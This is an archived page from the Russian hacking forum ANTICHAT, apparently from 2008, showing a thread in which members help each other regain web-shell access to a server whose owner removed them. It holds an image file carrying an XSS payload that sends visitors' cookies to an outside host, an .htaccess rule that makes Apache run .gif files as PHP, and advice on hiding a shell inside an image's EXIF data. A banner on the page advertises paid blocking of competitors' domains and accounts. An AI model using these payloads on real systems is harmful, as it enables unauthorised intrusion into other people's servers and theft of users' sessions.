УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 124 из 1393

124

Опции темы

Поиск в этой теме

Опции просмотра

#1231

17.03.2008, 18:48

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

sha-1

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

проблемы с доступом к серверу

#1232

17.03.2008, 22:13

prozorov

Познающий

Регистрация: 19.01.2007

Сообщений: 53

Провел на форуме:
503896

Репутация: 6

Отправить сообщение для prozorov с помощью ICQ

проблемы с доступом к серверу

в общем, описываю ситуацию с самого начала.

был доступ к серву посредсвам шела, потом поимел доступ к бд итд
когда холдер заметил мое появление удалил все шелы.
залил заново, но теперь шел не запускается (пробовал разные).
видимо чтото с обработкой пхп. При запросе к пхп файлам вылазит пустая страница(в сорсах- хтмл=боди-боди-хтмл)
остался доступ к админке- заливаю без проблем, но редактить нельзя.
с БД тоже самое- просто вылазит пустая страница (с других ипов не пускает, сам прописывал свой ип в конфигах)
к записи в админке разрешены следующие форматы
txt, php, gif, jpg, xls, mdb, csv, rar, zip, css, doc, chm, pdf

Что сейчас можно сделать чтобы снова доступ получить? И что вообще холдер сделал?

Последний раз редактировалось prozorov; 17.03.2008 в 22:25..

#1233

17.03.2008, 22:56

n0ne

Постоянный

Регистрация: 01.01.2007

Сообщений: 796

Провел на форуме:
2693408

Репутация: 861

prozorov, Залей какой-нить скрипт для работы с бд на пхп и проверь работает ли, и просто <? echo 'henk'; ?>, и напиши результаты.

#1234

17.03.2008, 23:08

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

Провел на форуме:
8042357

Репутация: 3742

Отправить сообщение для blackybr с помощью ICQ

Отправить сообщение для blackybr с помощью AIM

Отправить сообщение для blackybr с помощью Yahoo

к примеру мог в папку куда все льется положить хтакцес с php_flag engine off

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

#1235

17.03.2008, 23:19

prozorov

Познающий

Регистрация: 19.01.2007

Сообщений: 53

Провел на форуме:
503896

Репутация: 6

Цитата:

Сообщение от n0ne

подходящих скриптов не нашел, но вроде обрабатывает
<? echo 'henk'; ?> тоже обрабатывает

хтакцес с php_flag engine off

может быть, я проверил все папки- результат один

кста, на сайте форум был, тоже работать перестал

#1236

18.03.2008, 00:53

MSDEN

Новичок

Регистрация: 07.05.2007

Сообщений: 12

Провел на форуме:
77696

Репутация: 1

нашел xss на сайте залив картинку png c таким содержанием

Код:

‰PNG         IHDR         Д‰   sRGB ®Ой   gAMA  ±Џьa    cHRM  z&  Ђ„  ъ   Ђи  u0  к`  :˜  pњєQ<   	pHYs     љњ   IDATWcш 	ыэ+ХE    IEND®B`‚<html>  <script>alert(/by_blabla_/)</script><script>img = new Image();  img.src = "http://s.netsec.ru/absent09.gif?"+document.cookie;</script>  </html> z&  Ђ„  ъ   Ђи  u0  к`  :˜  pњєQ<   	pHYs     љњ   IDATWcш 	ыэ+ХE    IEND®B`‚

напрашивается вопрос можно ли вставить шелл вместо <html> <script>alert(/by_blabal_/)</script><script>img = new Image(); img.src = "http://s.netsec.ru/absent09.gif?"+document.cookie;</script> </html> ?

я вставляю вместо этого код шелла а когда запускаю такое чувство будто php не работает =(

#1237

18.03.2008, 01:01

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

Провел на форуме:
8042357

Репутация: 3742

нет, xss выполняется на стороне клиента. пхп код который ты вставляешь тоже только показывается юзеру, но не выполняется на самом сервере

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

#1238

18.03.2008, 01:14

gibson

Moderator - Level 7

Регистрация: 24.02.2006

Сообщений: 447

Провел на форуме:
2872049

Репутация: 705

Отправить сообщение для gibson с помощью ICQ

Цитата:

Сообщение от prozorov

prozorov у тя safe mode on скорее всего с safe_mode_gid(on)

to MSDEN

по пробуй залить это

PHP код:


		
			
<Files "s.gif">

AddType application/x-httpd-php .gif

</Files>



и залить картинку с шеллом.

#1239

18.03.2008, 01:20

MSDEN

Новичок

Регистрация: 07.05.2007

Сообщений: 12

Провел на форуме:
77696

Репутация: 1

gibson, я в этом чуть чуть чайнег
<Files "s.gif">
AddType application/x-httpd-php .gif
</Files> залить в виде чего? как второй файл чтоли?
а какртинку с шеллом как залить? просто у шелла разрешение поменять?
если нетрудно дай аську

#1240

18.03.2008, 02:20

o3,14um

Участник форума

Регистрация: 16.11.2006

Сообщений: 230

Провел на форуме:
599789

Репутация: 227

Цитата:

<Files "s.gif">
AddType application/x-httpd-php .gif
</Files>

это текст в файле .htaccess (тип настройка в апаче). Этот файл говорит апачу, чтобы расшширение ГИФ он воспринимал как скрипт.

Как залить? ЕСли у тя там проверка тока по расширению, то поменяй просто расширение. а если по типу, то допиши шелл в конец картинки. (ну например в свойствах в поле exif впиши)

Страница 124 из 1393

124

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход